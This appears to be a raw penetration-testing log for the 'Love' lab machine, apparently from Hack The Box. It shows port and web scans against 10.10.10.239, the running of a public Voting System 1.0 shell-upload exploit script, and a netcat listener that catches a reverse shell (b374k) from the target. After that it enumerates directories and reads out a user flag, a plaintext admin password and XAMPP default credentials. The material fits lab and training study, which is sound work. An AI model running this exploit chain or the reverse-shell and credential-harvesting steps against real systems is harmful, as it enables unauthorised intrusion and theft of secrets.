Love

$ nmap -p- -T4 -A 10.10.10.239
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp   open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql?
| fingerprint-strings: 
|   Kerberos, NCP, NULL, afp: 
|_    Host '10.10.14.133' is not allowed to connect to this MariaDB server
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp  open  unknown
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Not valid before: 2021-04-11T14:39:19
|_Not valid after:  2024-04-10T14:39:19
|_ssl-date: 2021-05-05T21:46:26+00:00; +32m26s from scanner time.
| tls-alpn: 
|_  http/1.1
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
Host script results:
|_clock-skew: mean: 2h17m26s, deviation: 3h30m01s, median: 32m25s
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-05-05T14:46:07-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-05-05T21:46:09
|_  start_date: N/A
$ nikto -h http://10.10.10.239
+ Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/7.3.27
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /Admin/: This might be interesting...
+ 8672 requests: 0 error(s) and 15 item(s) reported on remote host
$ dirb http://10.10.10.239
---- Scanning URL: http://10.10.10.239/ ----
==> DIRECTORY: http://10.10.10.239/admin/
==> DIRECTORY: http://10.10.10.239/Admin/
==> DIRECTORY: http://10.10.10.239/ADMIN/
+ http://10.10.10.239/aux (CODE:403|SIZE:302)
+ http://10.10.10.239/cgi-bin/ (CODE:403|SIZE:302)
+ http://10.10.10.239/com1 (CODE:403|SIZE:302)
+ http://10.10.10.239/com2 (CODE:403|SIZE:302)
+ http://10.10.10.239/com3 (CODE:403|SIZE:302)
+ http://10.10.10.239/con (CODE:403|SIZE:302)
==> DIRECTORY: http://10.10.10.239/dist/
+ http://10.10.10.239/examples (CODE:503|SIZE:402)
==> DIRECTORY: http://10.10.10.239/images/
==> DIRECTORY: http://10.10.10.239/Images/
==> DIRECTORY: http://10.10.10.239/includes/
+ http://10.10.10.239/index.php (CODE:200|SIZE:4388)
+ http://10.10.10.239/licenses (CODE:403|SIZE:421)
+ http://10.10.10.239/lpt1 (CODE:403|SIZE:302)
+ http://10.10.10.239/lpt2 (CODE:403|SIZE:302)
+ http://10.10.10.239/nul (CODE:403|SIZE:302)
+ http://10.10.10.239/phpmyadmin (CODE:403|SIZE:302)
==> DIRECTORY: http://10.10.10.239/plugins/
+ http://10.10.10.239/prn (CODE:403|SIZE:302)
+ http://10.10.10.239/server-info (CODE:403|SIZE:421)
+ http://10.10.10.239/server-status (CODE:403|SIZE:421)
+ http://10.10.10.239/webalizer (CODE:403|SIZE:302)

---- Entering directory: http://10.10.10.239/admin/ ----
+ http://10.10.10.239/admin/aux (CODE:403|SIZE:302)
+ http://10.10.10.239/admin/com1 (CODE:403|SIZE:302)
+ http://10.10.10.239/admin/com2 (CODE:403|SIZE:302)
+ http://10.10.10.239/admin/com3 (CODE:403|SIZE:302)
+ http://10.10.10.239/admin/con (CODE:403|SIZE:302)
==> DIRECTORY: http://10.10.10.239/admin/includes/
+ http://10.10.10.239/admin/index.php (CODE:200|SIZE:6198)
+ http://10.10.10.239/admin/lpt1 (CODE:403|SIZE:302)
+ http://10.10.10.239/admin/lpt2 (CODE:403|SIZE:302)
+ http://10.10.10.239/admin/nul (CODE:403|SIZE:302)
+ http://10.10.10.239/admin/prn (CODE:403|SIZE:302)

---- Entering directory: http://10.10.10.239/Admin/ ----
+ http://10.10.10.239/Admin/aux (CODE:403|SIZE:302)
+ http://10.10.10.239/Admin/com1 (CODE:403|SIZE:302)
+ http://10.10.10.239/Admin/com2 (CODE:403|SIZE:302)
+ http://10.10.10.239/Admin/com3 (CODE:403|SIZE:302)
+ http://10.10.10.239/Admin/con (CODE:403|SIZE:302)
==> DIRECTORY: http://10.10.10.239/Admin/includes/
+ http://10.10.10.239/Admin/index.php (CODE:200|SIZE:6198)
+ http://10.10.10.239/Admin/lpt1 (CODE:403|SIZE:302)
+ http://10.10.10.239/Admin/lpt2 (CODE:403|SIZE:302)
+ http://10.10.10.239/Admin/nul (CODE:403|SIZE:302)
+ http://10.10.10.239/Admin/prn (CODE:403|SIZE:302)

---- Entering directory: http://10.10.10.239/ADMIN/ ----
+ http://10.10.10.239/ADMIN/aux (CODE:403|SIZE:302)
+ http://10.10.10.239/ADMIN/com1 (CODE:403|SIZE:302)
+ http://10.10.10.239/ADMIN/com2 (CODE:403|SIZE:302)
+ http://10.10.10.239/ADMIN/com3 (CODE:403|SIZE:302)
+ http://10.10.10.239/ADMIN/con (CODE:403|SIZE:302)
==> DIRECTORY: http://10.10.10.239/ADMIN/includes/
+ http://10.10.10.239/ADMIN/index.php (CODE:200|SIZE:6198)
+ http://10.10.10.239/ADMIN/lpt1 (CODE:403|SIZE:302)
+ http://10.10.10.239/ADMIN/lpt2 (CODE:403|SIZE:302)
+ http://10.10.10.239/ADMIN/nul (CODE:403|SIZE:302)
+ http://10.10.10.239/ADMIN/prn (CODE:403|SIZE:302)

---- Entering directory: http://10.10.10.239/dist/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.239/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.239/Images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.239/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.239/plugins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.239/admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.239/Admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.239/ADMIN/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

Voting System 1.0 Shell Upload
https://packetstormsecurity.com/files/161031/Voting-System-1.0-Shell-Upload.html
kali@kali:~/0.htb/machines/Love239$ nc -lvnp 8888

kali@kali:~/0.htb/machines/Love239$ python3 shellupload.py 
Start a NC listner on the port you choose above and run...
Logged in
Poc sent successfully


kali@kali:~/0.htb/machines/Love239$ nc -lvnp 8888
listening on [any] 8888 ...
connect to [10.10.14.133] from (UNKNOWN) [10.10.10.239] 53061
b374k shell : connected

Microsoft Windows [Version 10.0.19042.928]
(c) Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\omrs\images>
C:\xampp\htdocs\omrs\images>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 56DE-BA30

 Directory of C:\xampp\htdocs\omrs\images

05/06/2021  06:08 AM    <DIR>          .
05/06/2021  06:08 AM    <DIR>          ..
05/06/2021  06:08 AM             5,632 D3fa1t_shell.exe
05/18/2018  08:10 AM             4,240 facebook-profile-image.jpeg
04/12/2021  03:53 PM                 0 index.html.txt
01/27/2021  12:08 AM               844 index.jpeg
08/24/2017  04:00 AM            26,644 profile.jpg
05/06/2021  06:08 AM             6,495 shell.php
               6 File(s)         43,855 bytes
               2 Dir(s)   2,232,213,504 bytes free

C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe

C:\Users\Phoebe\Desktop>type user.txt
type user.txt
8086de462d74e656846ea860579218e5
C:\xampp\htdocs\omrs\images>cd ..
cd ..

C:\xampp\htdocs\omrs>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 56DE-BA30

 Directory of C:\xampp\htdocs\omrs

04/13/2021  09:54 AM    <DIR>          .
04/13/2021  09:54 AM    <DIR>          ..
04/12/2021  08:27 AM    <DIR>          admin
04/12/2021  08:29 AM    <DIR>          bower_components
04/12/2021  08:29 AM    <DIR>          dist
05/18/2018  10:50 AM             7,480 home.php
05/06/2021  06:08 AM    <DIR>          images
04/12/2021  08:29 AM    <DIR>          includes
05/16/2018  12:34 PM             1,572 index.php
05/16/2018  12:31 PM               668 login.php
04/26/2018  01:25 PM                84 logout.php
04/12/2021  08:29 AM    <DIR>          plugins
05/17/2018  11:02 AM             1,705 preview.php
05/18/2018  10:49 AM             1,502 submit_ballot.php
04/12/2021  08:29 AM    <DIR>          tcpdf
04/12/2021  08:29 AM    <DIR>          votesystem
               6 File(s)         13,011 bytes
              10 Dir(s)   2,232,205,312 bytes free

C:\xampp\htdocs\omrs>

C:\xampp\htdocs>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 56DE-BA30

 Directory of C:\xampp\htdocs

04/12/2021  08:29 AM    <DIR>          .
04/12/2021  08:29 AM    <DIR>          ..
08/27/2019  07:02 AM             3,607 applications.html
08/27/2019  07:02 AM               177 bitnami.css
04/12/2021  08:16 AM    <DIR>          dashboard
07/16/2015  08:32 AM            30,894 favicon.ico
04/12/2021  08:29 AM    <DIR>          FFS
04/12/2021  08:16 AM    <DIR>          img
07/16/2015  08:32 AM               260 index.php
04/13/2021  09:54 AM    <DIR>          omrs
04/12/2021  08:29 AM    <DIR>          passwordmanager
04/12/2021  08:16 AM    <DIR>          webalizer
04/12/2021  08:16 AM    <DIR>          xampp
               4 File(s)         34,938 bytes
               9 Dir(s)   2,208,567,296 bytes free


Directory of C:\xampp\htdocs\passwordmanager

04/12/2021  08:29 AM    <DIR>          .
04/12/2021  08:29 AM    <DIR>          ..
04/12/2021  12:25 PM                45 creds.txt
01/27/2021  06:32 PM             4,720 index.php
               2 File(s)          4,765 bytes
               2 Dir(s)   2,208,235,520 bytes free

C:\xampp\htdocs\passwordmanager>type creds.txt
type creds.txt
Vote Admin Creds admin: @LoveIsInTheAir!!!!

C:\xampp\webdav>type webdav.txt
type webdav.txt
WEB-DAV für den gemeinsamen REMOTE-Zugriff
auf WWW-Dokumente über den Apache2.

Die Module mod_dav.so und mod_dav_fs.so auskommentieren
URL: http://localhost/webdav/
User: wampp Password: xampp
E-Mail-Adresse bei Dreamweaver angeben. 
Lokales Directory: /xampp/webdav/

C:\xampp>type passwords.txt
type passwords.txt
### XAMPP Default Passwords ###

1) MySQL (phpMyAdmin):

   User: root
   Password:
   (means no password!)

2) FileZilla FTP:

   [ You have to create a new user on the FileZilla Interface ] 

3) Mercury (not in the USB & lite version): 

   Postmaster: Postmaster (postmaster@localhost)
   Administrator: Admin (admin@localhost)

   User: newuser  
   Password: wampp 

4) WEBDAV: 

   User: xampp-dav-unsecure
   Password: ppmax2011
   Attention: WEBDAV is not active since XAMPP Version 1.7.4.
   For activation please comment out the httpd-dav.conf and
   following modules in the httpd.conf
   
   LoadModule dav_module modules/mod_dav.so
   LoadModule dav_fs_module modules/mod_dav_fs.so  
   
   Please do not forget to refresh the WEBDAV authentification (users and passwords).   

WinRM (port 5985,5986)
